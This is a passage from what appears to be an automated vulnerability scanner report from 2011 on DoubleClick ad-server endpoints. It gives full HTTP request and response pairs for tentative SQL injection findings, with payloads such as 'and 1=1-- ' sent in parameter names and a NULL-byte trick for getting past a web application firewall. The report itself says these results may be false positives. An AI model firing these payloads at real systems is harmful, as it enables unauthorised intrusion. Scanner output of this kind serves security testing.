document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/f;226750343;0-0;0;50154095;2321-160/600;39921267/39939054/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_160x600.gif" border=0 alt="Advertisement"></a>');

1.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:09:40 GMT
Content-Length: 568

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/u;234024712;1-0;0;50154300;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:09:41 GMT
Content-Length: 555

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>');

1.7. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.4

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:31 GMT
Content-Length: 1182

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/i;239661426;2-0;0;60600998;3454-728/90;41548003/41565790/3;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3Dhttp://success.adobe.com/en/na/sem/products/creativesuite/production.html?kw=p&sdid=IEFXK"><img src="http://s0.2mdn.net/viewad/1295336/Adobe_CS5-5_ProdPremShipV3_728x90_img.jpg" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:32 GMT
Content-Length: 1171

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/e;239661426;6-0;0;60600998;3454-728/90;41953580/41971367/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3Dhttp://success.adobe.com/en/na/sem/products/creativesuite/family.html?sdid=IEFXK"><img src="http://s0.2mdn.net/viewad/1295336/Adobe_CS5-5_FamilyShipV2_728x90_img.jpg" border=0 alt="Advertisement"></a>');

1.8. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.4

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:07 GMT
Content-Length: 8686

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 14:34:49 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:08 GMT
Content-Length: 1180

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/g;239661426;4-0;0;60600998;3454-728/90;41953322/41971109/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6d
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N6715.274177.WEBMD.COM/B5443050.15

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10652684%20or%201%3d1--%20 and 10652684%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?&110652684%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:06:07 GMT
Content-Length: 5277

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 17:39:58 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/basketball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/Basketball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
